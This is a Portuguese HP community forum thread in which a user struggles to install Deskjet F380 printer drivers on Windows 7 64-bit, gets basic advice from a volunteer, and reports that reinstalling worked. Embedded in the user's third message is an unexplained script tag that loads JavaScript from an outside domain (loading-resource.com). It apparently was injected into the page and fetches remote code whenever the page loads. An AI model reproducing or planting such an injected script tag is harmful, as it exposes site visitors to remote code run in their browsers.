Pergunta
Responder

Estudante com Louvor
joliver
Membro desde: ‎25-10-2012
Mensagem 1 de 4 (129 Exibições)

DRIVERS DA IMPRESSORA HP DESKJET F380

Meu PC tem o sistema operacional Windows 7 - 64 bits, conforme pesquisa que fiz Iniciar/Meu Computador/Propriedades. Por diversas vezes baixei o pacote de drivers para o Windows 7 - 64 bits no site da HP, mas quando tento instalar aparece a mensagem que o SO atual é 601.64 e que o Suportado é Vista 64.   Então baixei o pacote de drivers para o Vista 64, não sendo possível sua instalaçao, aparecendo a mensagem que o SO é Vista 64 e que o Suportado é Windows 7 64. Não sei mais o que fazer. Agradeço pela orientação que puder me ser dada.

Professor Notável
corvolino
Membro desde: ‎28-11-2011
Mensagem 2 de 4 (128 Exibições)

Re: DRIVERS DA IMPRESSORA HP DESKJET F380

Olá tudo bom?

Clique em Iniciar e na opção Meu Computador clique com o botão direito e vá na opção Propriedades. Uma nova janela irá se abrir e nela mostrará o sistema instalado em seu aparelho. Feito isso é só entrar no site da HP e fazer o download do driver para sua impressora e instalar.

Abraços

Eu NÃO SOU FUNCIONÁRIO DA HP, sou um VOLUNTÁRIO!
Sua dúvida foi tirada? Forneça 'JOINHA' ~CLIQUE NA MÃO~ a pessoa que te ajudou e marque o tópico como 'ACEITA COMO SOLUÇAO'.
Estudante com Louvor
joliver
Membro desde: ‎25-10-2012
Mensagem 3 de 4 (117 Exibições)

Refiz tudo que já tinha feito e acabou dando certo.

Obrigado.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Professor Notável
corvolino
Membro desde: ‎28-11-2011
Mensagem 4 de 4 (113 Exibições)

Não consegiu identificar a arquitetura e versão do sistema instalado em seu computador?

Eu NÃO SOU FUNCIONÁRIO DA HP, sou um VOLUNTÁRIO!
Sua dúvida foi tirada? Forneça 'JOINHA' ~CLIQUE NA MÃO~ a pessoa que te ajudou e marque o tópico como 'ACEITA COMO SOLUÇAO'.
† As opiniões expressas acima são de responsabilidade exclusiva de seus autores, e não da HP. Utilizar este site significa aceitar os termos de uso e as Regras de Participação